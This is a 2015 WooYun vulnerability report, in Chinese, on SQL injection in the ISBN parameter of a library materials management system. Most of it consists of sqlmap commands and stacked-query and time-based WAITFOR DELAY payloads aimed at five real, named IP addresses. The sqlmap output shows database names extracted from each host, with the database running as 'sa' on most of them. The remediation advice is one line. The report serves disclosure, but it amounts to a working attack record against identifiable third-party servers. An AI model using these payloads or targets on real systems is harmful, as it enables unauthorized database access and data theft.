漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-091769
漏洞标题: 博云非书资料管理系统存在通用型SQL注入
相关厂商:杭州麦达电子有限公司
漏洞作者: 路人甲
提交时间:2015-01-19 11:13
修复时间:2015-04-20 14:22
公开时间:2015-04-20 14:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某非书资料管理系统存在通用型SQL注入
详细说明:
注入点ISBN
http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
http://202.197.107.11:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
http://210.32.205.51:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
http://166.111.120.132/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
http://211.67.182.137:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
1、
http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
sqlmap.py -u "http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 124 HTTP(s) req
uests:
---
Place: GET
Parameter: ISBN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR
DELAY '0:0:5';--&SSH=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR D
ELAY '0:0:5'--&SSH=
---
[08:37:18] [INFO] testing MySQL
[08:37:18] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[08:37:18] [WARNING] the back-end DBMS is not MySQL
[08:37:18] [INFO] testing Oracle
[08:37:18] [WARNING] the back-end DBMS is not Oracle
[08:37:18] [INFO] testing PostgreSQL
[08:37:18] [WARNING] the back-end DBMS is not PostgreSQL
[08:37:18] [INFO] testing Microsoft SQL Server
[08:37:28] [INFO] confirming Microsoft SQL Server
[08:37:49] [INFO] adjusting time delay to 1 second due to good response times
[08:37:49] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[08:37:49] [INFO] fetching current user
[08:37:49] [INFO] retrieved: sa
current user: 'sa'
[08:38:06] [INFO] fetching current database
[08:38:06] [INFO] retrieved: proone
current database: 'proone'
[08:39:16] [INFO] fetching database names
[08:39:16] [INFO] fetching number of databases
[08:39:16] [INFO] retrieved: 5
[08:39:23] [INFO] retrieved: master
[08:40:22] [INFO] retrieved: model
[08:41:17] [INFO] retrieved: msdb
[08:41:58] [INFO] retrieved: proone
[08:43:13] [INFO] retrieved: tempdb
available databases [5]:
[*] [proone\x03]
[*] master
[*] model
[*] msdb
[*] tempdb
2、
http://202.197.107.11:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
sqlmap.py -u "http://202.197.107.11:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 126 HTTP(s) req
uests:
---
Place: GET
Parameter: ISBN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR
DELAY '0:0:5';--&SSH=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR D
ELAY '0:0:5'--&SSH=
---
[09:42:21] [INFO] testing MySQL
[09:42:21] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[09:42:38] [WARNING] the back-end DBMS is not MySQL
[09:42:38] [INFO] testing Oracle
[09:42:55] [WARNING] the back-end DBMS is not Oracle
[09:42:55] [INFO] testing PostgreSQL
[09:43:12] [WARNING] the back-end DBMS is not PostgreSQL
[09:43:12] [INFO] testing Microsoft SQL Server
[09:43:39] [INFO] confirming Microsoft SQL Server
[09:44:39] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[09:44:39] [INFO] fetching current user
[09:44:39] [INFO] retrieved:
[09:45:06] [INFO] adjusting time delay to 4 seconds due to good response times
sa1
current user: 'sa1'
[09:54:25] [INFO] fetching current database
[09:54:25] [INFO] retrieved: proon
[10:11:41] [ERROR] invalid character detected. retrying..
[10:11:41] [WARNING] increasing time delay to 5 seconds
e11
current database: 'proone11'
[10:21:31] [INFO] fetching database names
[10:21:31] [INFO] fetching number of databases
[10:21:31] [INFO] retrieved: 12
[10:25:24] [INFO] retrieved: CDT
[10:36:29] [ERROR] invalid character detected. retrying..
[10:36:29] [WARNING] increasing time delay to 6 seconds
owe
[10:48:58] [ERROR] invalid character detected. retrying..
[10:48:58] [WARNING] increasing time delay to 7 seconds
r_CHS
[11:06:25] [INFO] retrieved: idl40
[11:24:37] [INFO] retrieved: idltt
[11:43:03] [INFO] retrieved: master
[12:03:40] [INFO] retrieved: model
[12:21:43] [INFO] retrieved: msdb
[12:36:06] [INFO] retrieved: Northwind
[13:07:36] [INFO] retrieved: proone
[13:29:33] [INFO] retrieved: proone11
[13:56:52] [INFO] retrieved: proone28
[14:25:12] [INFO] retrieved: pubs
[14:40:08] [INFO] retrieved: tempdb
available databases [12]:
[*] CDTower_CHS
[*] idl40
[*] idltt
[*] master
[*] model
[*] msdb
[*] Northwind
[*] proone
[*] proone11
[*] proone28
[*] pubs
[*] tempdb
3、
http://210.32.205.51:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
sqlmap.py -u "http://210.32.205.51:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 103 HTTP(s) req
uests:
---
Place: GET
Parameter: ISBN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR
DELAY '0:0:5';--&SSH=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR D
ELAY '0:0:5'--&SSH=
---
[11:03:46] [INFO] testing MySQL
[11:03:46] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[11:03:51] [WARNING] the back-end DBMS is not MySQL
[11:03:51] [INFO] testing Oracle
[11:03:56] [WARNING] the back-end DBMS is not Oracle
[11:03:56] [INFO] testing PostgreSQL
[11:04:01] [WARNING] the back-end DBMS is not PostgreSQL
[11:04:01] [INFO] testing Microsoft SQL Server
[11:04:15] [INFO] confirming Microsoft SQL Server
[11:04:51] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[11:04:52] [INFO] fetching current user
[11:04:52] [INFO] retrieved:
[11:05:56] [INFO] adjusting time delay to 4 seconds due to good response times
p
[11:06:40] [INFO] adjusting time delay to 3 seconds due to good response times
roone
current user: 'proone'
[11:12:26] [INFO] fetching current database
[11:12:26] [INFO] retrieved: prooneproone
current database: 'prooneproone'
[11:26:17] [INFO] fetching database names
[11:26:17] [INFO] fetching number of databases
[11:26:17] [INFO] retrieved: 6
[11:27:14] [INFO] retrieved: master
[11:33:57] [INFO] retrieved: model
[11:39:58] [INFO] retrieved: msdb
[11:44:36] [INFO] retrieved: proone
[11:52:01] [INFO] retrieved: prooneproone
[12:05:58] [INFO] retrieved: tempdb
available databases [6]:
[*] master
[*] model
[*] msdb
[*] proone
[*] prooneproone
[*] tempdb
4、
http://166.111.120.132/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
sqlmap.py -u "http://166.111.120.132/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 103 HTTP(s) req
uests:
---
Place: GET
Parameter: ISBN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR
DELAY '0:0:5';--&SSH=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR D
ELAY '0:0:5'--&SSH=
---
[16:17:24] [INFO] testing MySQL
[16:17:24] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[16:17:29] [WARNING] the back-end DBMS is not MySQL
[16:17:29] [INFO] testing Oracle
[16:17:34] [WARNING] the back-end DBMS is not Oracle
[16:17:34] [INFO] testing PostgreSQL
[16:17:39] [WARNING] the back-end DBMS is not PostgreSQL
[16:17:39] [INFO] testing Microsoft SQL Server
[16:17:53] [INFO] confirming Microsoft SQL Server
[16:18:31] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[16:18:31] [INFO] fetching current user
[16:18:31] [INFO] retrieved: sa
current user: 'sa\x03'
[16:22:41] [INFO] fetching current database
[16:22:41] [INFO] retrieved: proone
current database: 'proone'
[16:32:21] [INFO] fetching database names
[16:32:21] [INFO] fetching number of databases
[16:32:21] [INFO] retrieved: 6
[16:33:30] [INFO] retrieved: cadal
[16:41:25] [INFO] retrieved: master
[16:51:17] [INFO] retrieved: model
[16:59:06] [INFO] retrieved:
[17:00:51] [ERROR] invalid character detected. retrying..
[17:00:51] [WARNING] increasing time delay to 6 seconds
msdb
[17:08:21] [INFO] retrieved: proone
[17:18:53] [INFO] retrieved: te
[17:23:43] [ERROR] invalid character detected. retrying..
[17:23:43] [WARNING] increasing time delay to 7 seconds
mpdb
available databases [6]:
[*] [cadal\x03]
[*] [master\x19]
[*] [msdb\x02]
[*] model
[*] proone
[*] tempdb
5、
http://211.67.182.137:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
sqlmap.py -u "http://211.67.182.137:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 102 HTTP(s) req
uests:
---
Place: GET
Parameter: ISBN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR
DELAY '0:0:5';--&SSH=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR D
ELAY '0:0:5'--&SSH=
---
[16:55:36] [INFO] testing MySQL
[16:55:36] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[16:55:53] [WARNING] the back-end DBMS is not MySQL
[16:55:53] [INFO] testing Oracle
[16:56:10] [WARNING] the back-end DBMS is not Oracle
[16:56:10] [INFO] testing PostgreSQL
[16:56:27] [WARNING] the back-end DBMS is not PostgreSQL
[16:56:27] [INFO] testing Microsoft SQL Server
[16:56:54] [INFO] confirming Microsoft SQL Server
[16:57:54] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[16:57:54] [INFO] fetching current user
[16:57:54] [INFO] retrieved:
[16:58:21] [INFO] adjusting time delay to 4 seconds due to good response times
sa
current user: 'sa'
[17:05:10] [INFO] fetching current database
[17:05:10] [INFO] retrieved: proone
current database: 'proone'
[17:24:17] [INFO] fetching database names
[17:24:17] [INFO] fetching number of databases
[17:24:18] [INFO] retrieved: 9
[17:26:56] [INFO] retrieved: cxbook
[17:45:46] [INFO] retrieved: Dservices
[18:12:08] [INFO] retrieved: ma
[18:20:17] [ERROR] invalid character detected. retrying..
[18:20:17] [WARNING] increasing time delay to 5 seconds
s
[18:26:22] [ERROR] invalid character detected. retrying..
[18:26:22] [WARNING] increasing time delay to 6 seconds
t
[18:32:48] [ERROR] invalid character detected. retrying..
[18:32:48] [WARNING] increasing time delay to 7 seconds
er
[18:40:51] [INFO] retrieved: model
[18:59:01] [INFO] retrieved: msd
[19:11:37] [ERROR] invalid character detected. retrying..
[19:11:37] [WARNING] increasing time delay to 8 seconds
b
[19:16:38] [INFO] retrieved: N
[19:23:34] [ERROR] invalid character detected. retrying..
[19:23:34] [WARNING] increasing time delay to 9 seconds
orthwind
[19:54:29] [INFO] retrieved:
[19:58:34] [ERROR] unable to properly validate last character value ('p')..
proone
[20:15:05] [INFO] retrieved: pubs
[20:28:41] [INFO] retrieved: tempdb
available databases [9]:
[*] cxbook
[*] Dservices
[*] master
[*] model
[*] msdb
[*] Northwind
[*] proone
[*] pubs
[*] tempdb
漏洞证明:
已证明
修复方案:
过滤特殊字符
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝